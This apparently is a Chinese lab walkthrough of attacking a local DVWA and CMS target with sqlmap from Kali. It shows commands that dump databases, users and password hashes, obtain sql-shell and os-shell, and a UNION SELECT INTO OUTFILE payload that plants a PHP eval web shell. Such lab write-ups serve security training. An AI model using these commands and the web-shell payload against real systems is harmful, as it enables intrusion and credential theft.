实验环境要求:

1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

2、安装VMware® Workstation 14以上

总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机。使用kali中的sqlmap攻击dvwa上的sql注入和sql盲注漏洞。

使用sqlmap Safe 第1张

任务一、使用kali中的sqlmap攻击dvwa中sql注入漏洞(low)

  1. 测试dvwa注入点,截图

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

使用sqlmap Safe 第2张

  1. 列出所有数据库,截图

使用sqlmap Safe 第3张

  1. 获取数据表,截图

使用sqlmap Safe 第4张

  1. 获取数据,截图

使用sqlmap Safe 第5张

  1. 获取所有管理用户,截图

使用sqlmap Safe 第6张

  1. 获取用户密码,截图

使用sqlmap Safe 第7张

任务二、使用kali中的sqlmap攻击dvwa中sql注入漏洞(medium)

  1. 测试dvwa注入点,截图

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

使用sqlmap Safe 第8张

观察可以看出为POST表单

使用sqlmap Safe 第9张

使用Burp劫获POST信息

使用sqlmap Safe 第10张

将信息保存成文件

使用sqlmap Safe 第11张

使用文件进行攻击

使用sqlmap Safe 第12张

  1. 列出所有数据库,截图

使用sqlmap Safe 第13张

  1. 获取数据表,截图

使用sqlmap Safe 第14张

  1. 获取数据,截图

使用sqlmap Safe 第15张

  1. 获取所有管理用户,截图

使用sqlmap Safe 第16张

  1. 获取用户密码,截图

使用sqlmap Safe 第17张

任务三、使用kali中的sqlmap攻击dvwa中sql注入漏洞(high)

  1. 测试dvwa注入点,截图

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

观察页面信息为POST表单

使用sqlmap Safe 第18张

原始方法肯定不行,所以再试试刚才的方法

使用sqlmap Safe 第19张

保持请求

使用sqlmap Safe 第20张

使用sqlmap Safe 第21张

试过后发现失败

使用sqlmap Safe 第22张

使用sqlmap Safe 第23张

查看源码后使用二阶SQL注入—second-order

使用sqlmap Safe 第24张

 

  1. 列出所有数据库,截图

使用sqlmap Safe 第25张

  1. 获取数据表,截图

使用sqlmap Safe 第26张

  1. 获取数据,截图

使用sqlmap Safe 第27张

使用sqlmap Safe 第28张

  1. 获取所有管理用户,截图

使用sqlmap Safe 第29张

  1. 获取用户密码,截图

使用sqlmap Safe 第30张

 

拓展任务一、使用kali中的sqlmap攻击cms中sql注入漏洞

  1. 测试cms注入点,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1

使用sqlmap Safe 第31张

  1. 列出所有数据库,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs

使用sqlmap Safe 第32张

  1. 获取数据表,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables

使用sqlmap Safe 第33张

  1. 获取数据,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa

使用sqlmap Safe 第34张

使用sqlmap Safe 第35张

  1. 获取所有管理用户,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users

使用sqlmap Safe 第36张

使用sqlmap Safe 第37张

  1. 获取用户密码,截图

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords

使用sqlmap Safe 第38张

 

拓展任务二、通过sql注入漏洞获取sql-shell和os-shell

  1. 使用sqlmap查看当前用户是否为dba,截图

使用sqlmap Safe 第39张

使用sqlmap Safe 第40张

  1. 使用sqlmap获取sql-shell,截图

使用sqlmap Safe 第41张

  1. 使用sqlmap获取os-shell,截图

直接使用命令是错误的

使用sqlmap Safe 第42张

我们需要在靶机修改一些参数来实现

使用sqlmap Safe 第43张

使用sqlmap Safe 第44张

重启服务

使用sqlmap Safe 第45张

使用sqlmap Safe 第46张

  1. 通过sql注入漏洞上传一句话木马,截图

1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #

执行不了说明没有权限,修改dvwa文件权限

使用sqlmap Safe 第47张

    使用sqlmap Safe 第48张

使用sqlmap Safe 第49张

使用sqlmap Safe 第50张

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄